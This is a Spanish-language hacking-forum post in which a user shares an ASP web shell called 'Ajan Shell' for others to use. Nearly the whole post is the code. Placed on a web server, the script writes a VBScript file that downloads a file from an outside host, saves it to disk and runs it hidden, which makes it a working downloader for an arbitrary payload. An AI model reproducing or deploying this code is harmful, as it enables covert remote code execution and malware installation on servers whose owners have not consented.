Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Bugs y Exploits => Shells => Mensaje iniciado por: ANTRAX en Febrero 12, 2013, 08:21:48 pm

Título: [ASP] Ajan Shell
Publicado por: ANTRAX en Febrero 12, 2013, 08:21:48 pm
Hola a todos, les comparto esta shell hecha en ASP

Código: ASP
  1. <SCRIPT LANGUAGE="VBScript">
  2. <%
  3. Set entrika = CreateObject("Scripting.FileSystemObject")
  4. Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
  5. entrika.write "Dim BinaryData" & vbcrlf
  6. entrika.write "Dim xml" & vbcrlf
  7. entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
  8. entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
  9. entrika.write "xml.Send" & vbcrlf
  10. entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
  11. entrika.write "Const adTypeBinary = 1" & vbcrlf
  12. entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
  13. entrika.write "Dim BinaryStream" & vbcrlf
  14. entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
  15. entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
  16. entrika.write "BinaryStream.Open" & vbcrlf
  17. entrika.write "BinaryStream.Write BinaryData" & vbcrlf
  18. entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
  19. entrika.write "Dim WshShell"  & vbcrlf
  20. entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
  21. entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
  22. entrika.close
  23. Set entrika = Nothing
  24. Set entrika = Nothing
  25.  
  26. Dim WshShell
  27. Set WshShell = CreateObject("WScript.Shell")
  28. WshShell.Run "c:\net.vbs", 0, false
  29. %>
  30.  </SCRIPT>

Espero que les sirva

Saludos!
ANTRAX